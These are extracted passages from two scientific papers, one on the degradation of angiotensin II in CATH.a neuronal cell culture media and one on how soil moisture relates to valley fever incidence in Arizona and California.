cell culture media\n----------------------------------------------------------------------------\n\nLevels of AngII, Ang III, Ang IV, and Ang-1-7, were measured in CATH.a neuronal cell culture media 15 min -- 24 h after a single administration of exogenous AngII (100 nmol/L) into the media. ", "As expected, AngII was significantly elevated in the media 15 min after administration as compared to media collected immediately prior to treatment (Fig.[3](#fig03){ref-type=\"fig\"}A). ", "Levels of AngII rapidly decreased over time until 3 h-postadministration when levels of AngII in the media were significantly lower compared to the 15 min time-point and not significantly different than baseline levels. ", "AngII remained low, that is, it was undetectable 6 and 24 h after administration. ", "Interestingly, levels of Ang III (Fig.[3](#fig03){ref-type=\"fig\"}B) and Ang-1-7 (Fig.[3](#fig03){ref-type=\"fig\"}D) modestly, but significantly, increased 15--60 min after exogenous AngII administration. ", "In contrast, levels of Ang IV remained unchanged compared to baseline levels (Fig.[3](#fig03){ref-type=\"fig\"}C). ", "It should be noted that we specifically selected the AngII concentration of 100 nmol/L for these studies because we wanted to replicate, as best we could, the experimental conditions used in other published studies designed to examine the AngII-induced acute and chronic responses in cultured neurons. ", "For example, we previously used 100 nmol/L AngII to study AngII-mediated intraneuronal signaling in CATH.a neurons and have shown that at this concentration AngII-induced Nox4-generated mitochondrial superoxide production contributes to the rapid inhibition of outward K^+^ current (Yin et al. [", "@b43]; Case et al. [", "@b5]). ", "Furthermore, Sun et al., ", "have reported that 100 nmol/L AngII rapidly inhibits the delayed rectifier K^+^ current and increases neuronal firing rate in primary neurons isolated from the brain (Sun et al. [", "@b35], [@b36]). ", "Additional studies examining more long-term changes (i.e., hours to days) in the expression of various proteins, including AngII receptors, potassium channels, and transcription factors, also used 100 nmol/L AngII (Gao et al. [", "@b12]; Mitra et al. [", "@b26]; Haack et al. [", "@b17], [@b18]).", "\n\n![", "Exogenous AngII levels rapidly decrease within 3 h in CATH.a neuronal cell culture media. ", "Levels of AngII (A), Ang III (B), Ang IV (C), and Ang-1-7 (D) in CATH.a neuronal cell culture media following a single administration of exogenous AngII (100 nmol/L) as measured by liquid chromatography-tandem mass spectrometry. ", "Absolute concentrations were calculated against the standard ^13^C- and ^15^N-labeled AngII peptide. *", "n* = 3 separate experiments performed in triplicate. ", "\\**P* \\< 0.05 vs. 0min AngII; ^\\#^*P* \\< 0.05 vs. 15 min AngII.](phy20003-e12287-f3){#fig03}\n\nExogenous AngII is stable in neuronal cell culture media in the absence of CATH.a neurons\n-----------------------------------------------------------------------------------------\n\nThe rapid decrease in exogenous AngII levels in media collected from CATH.a neurons may suggest that the peptide is degraded by the media itself. ", "To examine this possibility, AngII (100 nmol/L) was added to the media in the absence of CATH.a neurons and samples were collected 15 min -- 24 h later (Fig.[4](#fig04){ref-type=\"fig\"}). ", "AngII levels remained significantly elevated at all time-points with concentrations near the starting concentration of 100 nmol/L (Fig.[4](#fig04){ref-type=\"fig\"}A). ", "In contrast, levels of Ang III, Ang IV, and Ang-1-7 were not significantly different than baseline levels (Fig.[4](#fig04){ref-type=\"fig\"}B--D).", "\n\n![", "AngII is stable in neuronal cell culture media in the absence of CATH.a neurons. ", "Levels of AngII (A), Ang III (B), Ang IV (C), and Ang-1-7 (D) in cell culture media without CATH.a neurons following a single administration of exogenous AngII (100 nmol/L) as detected by liquid chromatography and tandem mass spectrometry. ", "Absolute concentrations were calculated against the standard ^13^C- and ^15^N-labeled AngII peptide. *", "n* = 3 separate experiments performed in triplicate. ", "\\**P* \\< 0.05 vs. 0 min.](phy20003-e12287-f4){#fig04}\n\nReplenishing CATH.a neuronal cell culture media every 3 h with fresh exogenous AngII results in chronic elevated levels\n-----------------------------------------------------------------------------------------------------------------------\n\nFinally, to determine if levels of AngII could be chronically elevated in CATH.a neuronal cell culture media, we administered fresh exogenous AngII (100 nmol/L) every 3 h and measured AngII for up to 24 h. As shown in Fig.[5](#fig05){ref-type=\"fig\"}, AngII levels remained similarly and significantly elevated (63--72 nmol/L) at each time-point compared to baseline levels.", "\n\n![", "Repeated administration of exogenous AngII every 3 h maintains a chronic elevated level of AngII in CATH.a neuronal cell culture media. ", "Levels of AngII in CATH.a neuronal cell culture media following repeated administration of exogenous AngII (100 nmol/L) into the media every 3 h for 6, 9, 12, 15, 21, and 24 h. Absolute concentrations were calculated against the standard ^13^C- and ^15^N-labeled AngII peptide. *", "n* = 3 separate experiments performed in triplicate. ", "\\**P* \\< 0.05 vs. 0 min.](phy20003-e12287-f5){#fig05}\n\nDiscussion\n==========\n\nThe pathogenesis of various cardiovascular disorders, such as hypertension and chronic heart failure, involves dysregulation of the brain angiotensinergic system (Phillips and Sumners [@b29]; Veerasingham and Raizada [@b37]; Zucker [@b47]). ", "Understanding the precise intraneuronal signaling mechanism(s) driving this dysregulation may lead to the identification of new targets for which novel therapeutics can be developed. ", "As such, numerous studies have focused on examining the intraneuronal signaling molecules and proteins mediating the physiological and pathophysiological responses of AngII (Sumners et al. [", "@b34]; Zimmerman [@b44]; Chan and Chan [@b6]). ", "Many of these studies have relied on neuronal cell culture models to demonstrate a role for signaling intermediates, such as calcium, reactive oxygen species, kinases, and transcription factors in mediating the AngII-induced response (Sun et al. [", "@b36]; Zimmerman et al. [", "@b45], [@b46]; Haack et al. [", "@b18]). ", "However, relating these in vitro observations to in vivo AngII-dependent cardiovascular diseases, such as hypertension and chronic heart failure, where circulating and central levels of AngII are chronically elevated (van de Wal et al. [", "@b38]; Xia et al. [", "@b41]) is problematic as the stability of exogenously administered AngII in neuronal cell culture media is unknown. ", "In the current study, we examined the stability of exogenous AngII in the culture media of an AngII-sensitive neuronal cell culture model, CATH.a neurons, that has commonly been utilized to study AngII intraneuronal signaling (Sun et al. [", "@b36]; Gao et al. [", "@b12]; Case et al. [", "@b5]). ", "Herein, we report that levels of exogenous AngII are diminished to near baseline levels within 3 h of treatment, and that media should be replenished with fresh AngII every 3 h to maintain chronically elevated levels of the peptide in this neuronal cell culture model.", "\n\nAcute stimulation (i.e., minutes) of cultured neurons with AngII results in a rapid increase in intracellular calcium (Zimmerman et al. [", "@b46]), inhibition of outward potassium current (*I*~Kv~) (Sun et al. [", "@b36]; Yin et al. [", "@b43]), and an increase in neuronal firing (Sun et al. [", "@b35]). ", "Chronic stimulation (i.e., hours to days) of AngII-sensitive cultured neurons leads to alterations in the expression of angiotensin receptors (Liu et al. [", "@b23]; Xia et al. [", "@b40]), potassium channel proteins (Gao et al. [", "@b12]), and transcription factors (Mitra et al. [", "@b26]). ", "However, in most, if not all, of these chronic stimulation studies, a single administration of exogenous AngII was given to neurons in culture. ", "This begs the questions of whether AngII remains stable in the culture media for hours or days to continuously activate its receptors to mediate these changes in protein expression or if these changes are a result of the immediate stimulation of AngII receptors followed by prolonged intraneuronal signaling events. ", "With these questions unanswered, it is difficult to compare results obtained from these types of in vitro studies with data obtained from in vivo cardiovascular disease models in which AngII receptors are likely constantly activated due to the chronically elevated levels of AngII. ", "Our new data presented herein indicates that levels of exogenously administered AngII in neuronal cell culture media are decreased to near baseline levels within 3 h; thus, suggesting that changes in protein expression at later time points are due to prolonged intraneuronal signaling events rather than continuous activation of AngII receptors. ", "In fact, we observed that within 15 min of treating cells with 100 nmol/L AngII only 53 ± 4 nmol/L AngII remained in the media, and by 3 h post-treatment, less than 5 nmol/L AngII remained. ", "As we report, some of the exogenous AngII is metabolized in the media to Ang III and Ang-1-7, as the concentration of these two peptides increased 15 min after AngII treatment. ", "We speculate that most of the AngII lost within the first 15 min of treatment is bound to the AngII receptors and internalized via receptor-mediated endocytosis. ", "In support of this hypothesis, previous studies using aortic smooth muscle cells have demonstrated that after AngII binds to its receptor, the complex is internalized with a half-time of less than 2 min (Anderson et al. [", "@b1]). ", "In addition, previous reports indicate a functional role for internalized AngII after it has bound to the AT~1~R and the complex has been endocytosed (Harris [@b19]). ", "For example, the complete AT~1~R-induced activation of mitogen-activated protein kinase (MAPK) is believed to be dependent on internalization (Yang et al. [", "@b42]). ", "Furthermore, nuclear membrane-associated angiotensin receptors have been identified (Pendergrass et al. [", "@b28]; Gwathmey et al. [", "@b16]) and may be stimulated by internalized AngII and/or by AngII generated via an intracellular renin--angiotensin system (Grobe et al. [", "@b14]).", "\n\nAfter observing the rapid decrease in exogenously administered AngII in the media of our neuronal cell culture model, we questioned whether this was cell-mediated or nonspecific degradation of AngII in the media. ", "To address this question, we measured levels of AngII in culture media in the absence of CATH.a neurons after a single exogenous administration of 100 nmol/L AngII, and found that AngII is relatively stable in the media. ", "More specifically, the concentration of AngII at all time-points measured (15 min -- 24 h) was approximately 80 nmol/L or greater. ", "Taken together with our results in the presence of CATH.a neurons, these data suggest that the rapid loss of exogenous AngII in the media of CATH.a neurons is mostly cell-dependent with the AngII being metabolized to Ang III and Ang-1-7, or binding to its receptors, along with some nonspecific degradation of the peptide. ", "As such, it is likely that the stability of exogenous AngII in cultured media will be drastically different between various cells types. ", "That is, the expression levels of aminopeptidase A, which cleaves AngII to Ang III, ACE2, which cleaves AngII to Ang-1-7, and/or AngII receptors in a particular cell type will influence the stability of exogenous AngII in the respective media. ", "Although we did not observe a change in Ang IV in the current study with CATH.a neurons, it is tempting to speculate that the amount of aminopeptidase N, which cleaves Ang III to Ang IV, expressed by a particular cell line will also contribute to the levels of these angiotensin peptides in culture media. ", "Furthermore, it is possible that the stability of AngII in culture media may be experimentally manipulated by the exogenous administration of aminopeptidase inhibitors, ACE2 inhibitors, and/or AngII receptor antagonists.", "\n\nIn conclusion, our results demonstrate that a single exogenous administration of AngII to CATH.a neurons in culture does not result in chronically elevated levels of AngII in the media. ", "As such, we sought to determine if multiple and sequential administration would keep AngII levels elevated chronically. ", "Our data show that giving fresh AngII (100 nmol/L) every 3 h to cultured CATH.a neurons does indeed keep levels of AngII in the media significantly elevated for at least 24 h. We believe cell culture models with chronically elevated levels of AngII are the ideal in vitro models that one should utilize to study the precise AngII-dependent intracellular signaling events that occur in cardiovascular diseases associated with systemic and/or local chronically elevated levels of AngII, including hypertension and chronic heart failure. ", "We posit that keeping levels of AngII chronically elevated in cell culture models will change the cellular response induced by AngII compared to the response induced by a single administration. ", "Alternatively, it is possible that AngII levels may not need to be chronically elevated in cell culture media to induce long-term effects as the initial stimulation of AngII receptors may activate intracellular signaling pathways that lead to chronic changes in the expression of AngII receptors, ion channel proteins, and transcription factors. ", "To address these hypotheses, our laboratory is currently investigating changes in AngII-dependent intracellular signaling events in CATH.a neurons exposed to single versus repeated administration of AngII. ", "More specifically, we are examining changes in AngII receptor expression, levels of reactive oxygen species and antioxidants, intracellular calcium concentration, activation of transcription factors, and expression of ion channels. ", "Importantly, we are comparing any changes in response to single or repeated administration of AngII to those that we observe in cardiovascular control brain nuclei (e.g. SFO, PVN, RVLM) collected from animal models in which AngII is known to be chronically elevated in the brain, including hypertensive and chronic heart failure models. ", "We believe these, and other, future studies will provide further insight into the importance of establishing cell culture models with chronically elevated levels of AngII to improve our understanding of AngII intracellular signaling pathways.", "\n\nWe thank the University of Nebraska -- Lincoln, Redox Biology Center\\'s Spectroscopy and Biophysics Core for assistance in performing these experiments.", "\n\nConflict of Interest\n====================\n\nNo conflicts of interest, financial or otherwise, are declared by the authors.", "\n\n[^1]: **Funding Information** The present study was supported by the National Heart, Lung, and Blood Institute (NHLBI) of the National Institutes of Health (NIH) (R01HL103942 to M.C. Zimmerman). ", "The University of Nebraska -- Lincoln, Redox Biology Center\\'s Spectroscopy and Biophysics Core is supported by an NIH National Institute of General Medical Sciences (NIGMS) center grant (P30GM103335).", "\n" ]
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[ "Coopersmith, E. J., J. E. Bell, K. Benedict, J. Shriber, O. McCotter, and M. H. Cosh (2017), Relating coccidioidomycosis (valley fever) incidence to soil moisture conditions, GeoHealth, 1, 51--63, doi:10.1002/2016GH000033.29124249\n\n1. ", "Introduction {#gh216-sec-0001}\n===============\n\nCoccidioidomycosis is caused by the fungus *Coccidioides* spp., ", "which is found in the soils of the southwestern United States, south central Washington State, and regions of South America, Central America, and Mexico. ", "This disease can cause flu‐like symptoms, which can persist for weeks or even months. ", "In a minority of cases, the infection can lead to pulmonary complications or spread from the lungs to other organ systems, leading to conditions of greater severity, such as meningitis \\[*Rosenstein et al*., [", "2001](#gh216-bib-0031){ref-type=\"ref\"}; *Galgiani et al*., [", "2005](#gh216-bib-0021){ref-type=\"ref\"}\\] or death \\[*Kolivras et al*., [", "2001](#gh216-bib-0025){ref-type=\"ref\"}; *Huang et al*., [", "2012](#gh216-bib-0023){ref-type=\"ref\"}\\]. ", "Though inhalation of these spores does not always cause illness, those who do become ill are hospitalized in over 40% of cases, with 75% of patients unable to perform their normal daily activities for a median of 47 days \\[*Tsang et al*., [", "2010](#gh216-bib-0038){ref-type=\"ref\"}\\].", "\n\nPrevious research has noted relationships between climatic features for which data are widely available and the incidence of coccidioidomycosis, noting proposed hydroclimatic and biological mechanisms by which these infections occur. *", "Kolivras and Comrie* \\[[2003](#gh216-bib-0024){ref-type=\"ref\"}\\], focusing their study upon Pima county in Arizona, hypothesized that a dry foresummer or fall kills other microorganisms that might compete with *Coccidioides*. ", "Subsequently, winter rainfall leads to the spore formation that results in high incidence during the following year. ", "A subsequent analysis by *Comrie* \\[[2005](#gh216-bib-0011){ref-type=\"ref\"}\\] also addressed the seasonal patterns of precipitation and temperature as they relate to the reported cases of coccidioidomycosis. ", "They, too, noted that precipitation during the preceding year\\'s summer or even the summer from 2 years previous is inversely related to reported cases of coccidioidomycosis. ", "This \"grow and blow\" hypothesis, in which wetter conditions cause spore formation and drier conditions facilitate their distribution, is corroborated in *Tamerius and Comrie* \\[[2011](#gh216-bib-0037){ref-type=\"ref\"}\\], where fall precipitation is correlated with exposures during the subsequent year. ", "Other works attempted to locate the ecological niche for *Coccidioides* within the arid Southwest \\[*Baptista‐Rosas et al*., [", "2007](#gh216-bib-0001){ref-type=\"ref\"}\\] using soil characteristics and other features, including moisture. ", "Finally, *Stacy et al.* ", "\\[[2012](#gh216-bib-0035){ref-type=\"ref\"}\\] employed normalized difference vegetation index as a proxy for soil moisture, showing antecedent winter precipitation\\'s impact on incidence during the following year.", "\n\nUnfortunately, in none of these cases were soil moisture data available in sufficient temporal and spatial scope to allow a more direct analysis---the effects of soil moisture on coccidioidomycosis incidence. ", "Three figures from some of the works cited within the literature review are worth mentioning. ", "Figure 5 from *Kolivras et al*. ", "\\[[2001](#gh216-bib-0025){ref-type=\"ref\"}\\] presents bimodal annual precipitation patterns in Arizona along with the annual pattern of valley fever incidence. ", "This figure illustrates that the monthly precipitation pattern in Pima county, AZ, does not describe (at least in large part) the pattern of coccidioidomycosis incidence. ", "Figures 1 and 2 from *Comrie* \\[[2005](#gh216-bib-0011){ref-type=\"ref\"}\\] illustrate, in the same county, annual and monthly precipitation patterns that do not align with coccidioidomycosis incidence rates. ", "As a result, soil moisture data provide an additional layer of insight to the analysis. ", "However, in addition to precipitation gauges at U.S. Climate Reference Network (USCRN) \\[*Bell et al*., [", "2013](#gh216-bib-0004){ref-type=\"ref\"}; *Diamond et al*., [", "2013](#gh216-bib-0020){ref-type=\"ref\"}\\] locations in California and Arizona (Figure [1](#gh216-fig-0001){ref-type=\"fig\"}), an in situ record has become available after 2010. ", "Moreover, USCRN sites contain colocated precipitation instruments. ", "Many of these instruments predate the installation of soil moisture gauges by several years, facilitating the calibration of a precipitation driven soil moisture model (the diagnostic soil moisture equation) \\[*Pan et al*., [", "2003](#gh216-bib-0028){ref-type=\"ref\"}; *Pan*, [2012](#gh216-bib-0029){ref-type=\"ref\"}\\] that can be used to achieve two objectives. ", "The first is to extend the soil moisture record backward temporally to the original installation of precipitation sensors---this was done in *Coopersmith et al*. ", "\\[[2015a](#gh216-bib-0013){ref-type=\"ref\"}\\]. ", "Second, by generating such a model, gaps in the soil moisture record (e.g., a day when a sensor was damaged by ambient meteorological conditions and a period during which readings were not recorded) can be filled with the model\\'s estimate. ", "As a result, a longer, more robust soil moisture record in Arizona and California is now available, enabling the types of direct comparisons not previously plausible with earlier in situ sensory resources.", "\n\n![(", "U.S. Climate Reference Network) USCRN soil moisture gauges within county maps of (left) Arizona and (right) California. ", "Counties with sufficient reported coccidioidomycosis cases in Arizona and California are shaded red and blue.](GH2-1-51-g001){#gh216-fig-0001}\n\n2. ", "Methodology {#gh216-sec-0002}\n==============\n\n2.1. ", "Defining the Coccidioidomycosis Data Set {#gh216-sec-0003}\n---------------------------------------------\n\nCoccidioidomycosis is currently a reportable disease in 22 states and is nationally notifiable to the U.S. Centers for Disease Control and Prevention through the National Notifiable Diseases Surveillance System (NNDSS). ", "We used the number of monthly coccidioidomycosis cases reported to NNDSS, by county, in Arizona and California during 2000--2014 to facilitate appropriate comparisons to determine robust relationships between soil moisture conditions and coccidioidomycosis. ", "We normalized the numbers of reported cases by the populations of the counties in which those cases are reported. ", "In California, 2000 and 2010 county census estimates are publically available from <http://censusviewer.com/counties/CA>. ", "The 2014 population figures by county can be obtained from <http://quickfacts.census.gov/qfd/maps/california_map.html>. ", "For years between 2000 and 2010 or between 2010 and 2014, a linear interpolation was performed.", "\n\nThe linear interpretation was performed for every year and county in California for which reported cases of coccidioidomycosis were available, and in analogous fashion for Arizona (data are available from and <http://censusviewer.com/counties/AZ> and <http://quickfacts.census.gov/qfd/maps/arizona_map.html>, respectively). ", "From here, we converted every monthly county estimate as shown in equation [(1)](#gh216-disp-0001){ref-type=\"disp-formula\"}: $$\\text{normalized}\\_ VF_{c,m,\\ y} = \\frac{VF_{c,\\ m,\\ y}}{P_{y}}*1,000,000\\text{.}$$\n\nIn equation [(1)](#gh216-disp-0001){ref-type=\"disp-formula\"}, *VF* ~*c*,*m*, *y*~ signifies the reported cases of coccidioidomycosis in a given county during a given month of a given year, *P* ~*y*~ denotes the estimated population during that year, and normalized\\_*VF* ~*c*,*m*,*y*~ represents the number of cases reported per one million residents.", "\n\nCounties with small populations and few reported cases can skew results. ", "For this reason, counties in which the averages of reported coccidioidomycosis cases did not exceed 10 per month were excluded from subsequent analysis. ", "The resulting subset of data included three counties in Arizona (Pima, Pinal, and Maricopa) and six counties in California (Fresno, Kern, Kings, Los Angeles, San Diego, and Tulare).", "\n\nA long‐term annual trend, more specifically an overall increase in coccidioidomycosis incidence (until 2012---incidence falls thereafter), has been noted in Arizona and California during the time period in question \\[*Centers for Disease Control and Prevention*, [2003](#gh216-bib-0007){ref-type=\"ref\"}, [2009](#gh216-bib-0008){ref-type=\"ref\"}\\]. ", "It is worth noting that changes in laboratory testing and reporting practices occurred during this time \\[*Centers for Disease Control and Prevention*, [2013](#gh216-bib-0009){ref-type=\"ref\"}\\]. ", "In Table [1](#gh216-tbl-0001){ref-type=\"table\"}, we observe a positive annual trend in coccidioidomycosis incidence in the selected counties in both California (blue) and Arizona (red). ", "Before performing subsequent analysis, these data are once again detrended to ensure that the changes observed in reported cases of coccidioidomycosis are related to soil moisture patterns rather than the consequence of long‐term trends.", "\n\n###### \n\nIncidence of Coccidioidomycosis per 1,000,000 Residents, Selected Counties in Arizona and California (2000--2014)\n\n Year \\# of Reported Cases per 1,000,000 Residents (Arizona) \\# of Reported Cases per 1,000,000 Residents (California)\n ------ -------------------------------------------------------- -----------------------------------------------------------\n 2000 460.5306325 89.48572189\n 2001 503.6564143 189.9703495\n 2002 635.5023968 239.6480424\n 2003 487.4520426 309.3800018\n 2004 723.4897709 367.8734306\n 2005 679.2749888 556.5844856\n 2006 997.392081 1045.732803\n 2007 914.9692501 619.8972283\n 2008 844.526981 700.8052481\n 2009 1656.425735 829.5482692\n 2010 1825.660079 1267.326671\n 2011 2420.537466 1045.615295\n 2012 1999.852074 775.0142713\n 2013 1012.168952 328.2901243\n 2014 982.4871174 248.2403409\n\nFirst, we present a simple, linear model for an annual trend in reported cases of coccidioidomycosis. ", "$$\\text{normalized}\\_ VF_{y} = \\beta_{0} + \\beta_{1}y\\text{.}$$\n\nIn equation [(2)](#gh216-disp-0002){ref-type=\"disp-formula\"}, normalized\\_*VF* ~*y*~ denotes the population‐normalized number of reported cases of coccidioidomycosis in year *y*, while *β* ~0~ and *β* ~1~ represent the coefficients describing intercept and slope, respectively. ", "Two relationships were developed of this form, one for Arizona and another for California. ", "Continuing, for each county, for each month, within a year *y*, the number of annual reported cases was normalized as shown: $$\\text{detrended}\\_ VF_{c,m,y} = \\frac{\\text{normalized}\\_ VF_{c,m,y}}{\\beta_{0} + \\beta_{1}y}*\\frac{\\sum_{i = 2000}^{2013}\\text{normalized}\\_ VF_{i}}{14}\\text{.}$$\n\nIn equation [(3)](#gh216-disp-0003){ref-type=\"disp-formula\"}, the detrended value for coccidioidomycosis cases reported (already normalized for population, see equation [(1)](#gh216-disp-0001){ref-type=\"disp-formula\"}) is denoted by detrended\\_*VF* ~*c*,*m*,*y*~, obtained by dividing the population‐normalized value for reported cases of coccidioidomycosis, normalized\\_*VF* ~*c*,*m*,*y*~ by the expected total for the year in question, subsequently multiplied by the average annual, population normalized total between 2000 and 2013, $\\frac{\\sum_{i = 2000}^{2013}\\text{normalized}\\_ VF_{i}}{14}$.\n\n2.2. ", "Defining the Corresponding Soil Moisture Data Set {#gh216-sec-0004}\n------------------------------------------------------\n\nWith soil moisture playing an increasingly important role in precision agricultural decision support \\[*Coopersmith et al*., [", "2014a](#gh216-bib-0017){ref-type=\"ref\"}\\], complex hydrologic models \\[e.g., *", "Grayson et al*., [", "1997](#gh216-bib-0022){ref-type=\"ref\"}; *Bell et al*., [", "2010](#gh216-bib-0003){ref-type=\"ref\"}\\], drought monitoring \\[e.g., *", "Sheffield et al*., [", "2004](#gh216-bib-0033){ref-type=\"ref\"}; *Bell et al*., [", "2015](#gh216-bib-0005){ref-type=\"ref\"}\\], and General Circulation Models \\[e.g., *", "Koster and Milly*, [1997](#gh216-bib-0026){ref-type=\"ref\"}; *Belair et al*., [", "2005](#gh216-bib-0002){ref-type=\"ref\"}; *Campoy et al*., [", "2013](#gh216-bib-0006){ref-type=\"ref\"}; *De Rosnay et al*., [", "2013](#gh216-bib-0019){ref-type=\"ref\"}; *Joetzjer et al*., [", "2013](#gh216-bib-0040){ref-type=\"ref\"}\\], the availability of in situ soil moisture resources has increased dramatically in the past decade. ", "As discussed in the previous section, an in situ network, the U.S. Climate Reference Network (USCRN), formed the basis of this inquiry \\[*Diamond et al*., [", "2013](#gh216-bib-0020){ref-type=\"ref\"}; *Bell et al*., [", "2013](#gh216-bib-0004){ref-type=\"ref\"}\\]. ", "USCRN provides quality controlled soil moisture and precipitation measurements at multiple for locations across the United States. ", "USCRN soil moisture measurements are produced in triplicate at each recorded depth (5 cm, 10 cm, 20 cm, 50 cm, and 100 cm). ", "For the purpose of this study, only the 5 cm soil moisture measurement was used, as this depth corresponds best with the capacity of dust particles to become airborne. ", "Please review the descriptions in *Bell et al*. ", "\\[[2013](#gh216-bib-0004){ref-type=\"ref\"}\\] for more specific information about the operation, quality assurance/quality control procedures, and logistics of the USCRN soil instrumentation.", "\n\nAs the soil moisture gauges contain colocated precipitation instruments, it is possible to calibrate models that transform a time series of antecedent precipitation into a soil moisture time series. ", "One such model, developed by *Pan et al*. ", "\\[[2003](#gh216-bib-0028){ref-type=\"ref\"}\\] and subsequently updated by *Pan* \\[[2012](#gh216-bib-0029){ref-type=\"ref\"}\\], is the diagnostic soil moisture equation. ", "As a simple, lumped‐bucket model, this equation convolutes the antecedent precipitation series and, via six parameters that can be calibrated via a genetic algorithm \\[*Coopersmith et al*., [", "2014b](#gh216-bib-0018){ref-type=\"ref\"}\\], returns a soil moisture estimate as shown in equations [(4)](#gh216-disp-0004){ref-type=\"disp-formula\"} and [(5)](#gh216-disp-0005){ref-type=\"disp-formula\"}. ", "$$\\theta_{est} = \\ \\theta_{re} + \\left( {\\phi_{e} - \\theta_{re}} \\right)\\left( {1 - e^{- c_{4}\\beta}} \\right)$$ $$\\beta = \\sum_{i = 2}^{i = n - 1}\\left\\lbrack {\\frac{P_{i}}{\\eta_{i}}\\left( {1 - e^{- \\frac{\\eta_{i}}{z}}} \\right)e^{- \\sum_{j = 1}^{j = i - 1}{(\\frac{\\eta_{j}}{z})}}} \\right\\rbrack + \\frac{P_{1}}{\\eta_{1}}\\left( {1 - e^{- \\frac{\\eta_{1}}{z}}} \\right)\\text{.}$$\n\nIn equation [(4)](#gh216-disp-0004){ref-type=\"disp-formula\"}, *θ* ~est~ represents the model\\'s soil moisture estimate via three parameters (*θ* ~re~, *ϕ* ~*e*~, and *c* ~4~). ", "Those three parameters signify the residual soil moisture (the level below which moisture levels will not fall, even after prolonged absences of precipitation), the porosity (the maximum quantity of moisture the soil can hold when saturated), and a drainage rate (note that a soil with *c~4~* = 0 drains infinitely rapidly, returning instantly to *θ* ~re~, a soil where *c~4~* is large drains extremely slowly, remaining at *ϕ* ~*e*~ in perpetuity). ", "The \"beta series,\" *β*, in equation [(5)](#gh216-disp-0005){ref-type=\"disp-formula\"}, convolutes an exponentially decaying series of precipitation totals, *P* ~*i*~, over a series of receding time stamps, *i,* from 1 to *n* (the maximum temporal distance at which rainfall can be considered relevant---that is, we ignore rainfall occurring farther back in time than *n* hours). ", "The prediction depth is signified by *z*, and the \"eta series,\" *η* ~*i*~, a sinusoidal estimate with a period of 1 year defining moisture losses due to evapotranspiration and deep drainage. ", "The eta series contains the remaining three parameters, defining the sinusoid\\'s amplitude, horizontal, and vertical shift (its period is known to be 1 year). ", "For further information regarding the calibration of these models and their implementation, please review the original literature \\[*Pan et al*., [", "2003](#gh216-bib-0028){ref-type=\"ref\"}; *Pan,* [2012](#gh216-bib-0029){ref-type=\"ref\"}\\] or the literature describing their more recent, machine learning‐based updates in *Coopersmith et al*. ", "\\[[2014b](#gh216-bib-0018){ref-type=\"ref\"}\\].", "\n\nParameters calibrated in this manner are shown to be viable for modeling soil moisture in other locations, provided that those locations are hydroclimatically and texturally similar to the calibration site *Coopersmith et al*. ", "\\[[2014b](#gh216-bib-0018){ref-type=\"ref\"}\\]. ", "Although the USCRN soil moisture gauges sites included in this analysis are not perfect edaphic matches for included counties, given the arid climate of the American southwest, perfunctory similarity will suffice. ", "In turn, these models have been used to extend the soil moisture records at these sites back to the initial installation of precipitation instruments \\[*Coopersmith et al*., [", "2015a](#gh216-bib-0013){ref-type=\"ref\"}\\] or to validate the performance of remotely sensed satellite estimates \\[*Coopersmith et al*., [", "2015b](#gh216-bib-0016){ref-type=\"ref\"}\\]. ", "For the purposes of this analysis, these modeled estimates will allow us to consider the performance of two related soil moisture time series in estimating future reported cases of coccidioidomycosis. ", "The first series denotes the modeled estimates, using the parameters calibrated at the location relevant location. ", "The second series is a \"merged\" series, utilizing the in situ estimate when one is available and the modeled estimate when one is not.", "\n\nFor selected counties in Arizona and California (Figure [1](#gh216-fig-0001){ref-type=\"fig\"}) with reported coccidioidomycosis cases, a soil moisture record is selected using the most geographically proximate in situ record from USCRN (Figure [1](#gh216-fig-0001){ref-type=\"fig\"}). ", "In Arizona, the nearest in situ record is located at the USCRN gauge near Tucson (USCRN \\#1011, nearest to Maricopa, Pima, and Pinal counties). ", "In California, the nearest in situ records are located near Yosemite Village (USCRN \\#1508, nearest to Fresno, Kings, and Tulare counties), Fallbrook (USCRN \\#1528, nearest to Los Angeles and San Diego counties), and Santa Barbara (USCRN \\#1529, nearest to Kern county). ", "The next section discusses the possible relationships to be explored with those soil moisture data.", "\n\nGiven the spatial disparity between these counties and the chosen USCRN sensors for which model estimates extend historical records, it is prudent at this stage to assess the capacity of these distant sensors to approximate the local soil moisture of interest. ", "First, the Advanced Microwave Scanning Radiometer--EOS (AMSR‐E) satellite estimates of soil moisture (available between June 2002 and October 2011) are extracted for the center of each of the counties considered. ", "As the in situ records at these USCRN locations typically begin in 2010 or 2011, the remotely sensed soil moisture values from AMSR are compared with the model estimates produced to extend the historical records at the USCRN locations utilized for the purposes of this analysis. ", "In *Coopersmith et al.* ", "\\[[2015b](#gh216-bib-0016){ref-type=\"ref\"}\\], these model estimates were compared to AMSR‐E data at the USCRN locations themselves. ", "The average accuracy reported in that analysis, after inclusion of an optimal gain and offset, was 0.047 m^3^/m^3^. The corresponding statistics, using AMSR‐E within the county rather than at the USCRN location itself, are reported in Table [2](#gh216-tbl-0002){ref-type=\"table\"}.", "\n\n###### \n\nComparison of USCRN In Situ and AMSR‐E Satellite Estimates[a](#gh216-note-0001){ref-type=\"fn\"}\n\n County USCRN RMSE, AMSR‐E, Ascending RMSE, AMSR‐E, Descending\n ------------- ------- ------------------------- --------------------------\n Fresno 1508 **0.050** **0.051**\n Kern 1529 *0*.*073* *0*.*074*\n Kings 1508 **0.051** **0.052**\n Los Angeles 1528 *0*.*073* *0*.*072*\n Maricopa 1011 **0.036** **0.036**\n Pima 1011 **0.035** **0.035**\n Pinal 1011 **0.035** **0.035**\n San Diego 1528 *0*.*073* *0*.*077*\n Tulare 1508 **0.046** **0.051**\n\nBolded values are from USCRN sensors used in the subsequent analysis.", "\n\nOf the nine counties listed, the RMSE values between the local AMSR‐E estimates and the model estimates at the nearest USCRN sensor are roughly in line with the reported RMSE values between USCRN model estimates and the local AMSR‐E retrievals. ", "Thus, these six counties are retained for further analysis. ", "Kern, Los Angeles, and San Diego, are subsequently removed via this criterion.", "\n\n2.3. ", "Defining Relationships to Consider {#gh216-sec-0005}\n---------------------------------------\n\nWith soil moisture records in place, the next step is to consider the various types of relationships for potential correlations. ", "Analogous to the 8 day averages of soil moisture utilized in *Wang et al*. ", "\\[[2007](#gh216-bib-0039){ref-type=\"ref\"}\\], this analysis focuses upon the monthly average soil moisture value. ", "As the period of record for coccidioidomycosis incidence falls between 2000 and 2014, ideally, the soil moisture record with which to compare these figures should cover the maximum proportion of these years. ", "For this reason, the extended records at the USCRN gauges (which begin when precipitation data are first available) are preferable to the in situ records for soil moisture. ", "In turn, just as *Wang et al*. ", "\\[[2007](#gh216-bib-0039){ref-type=\"ref\"}\\] utilized period averages with variable daily lags, 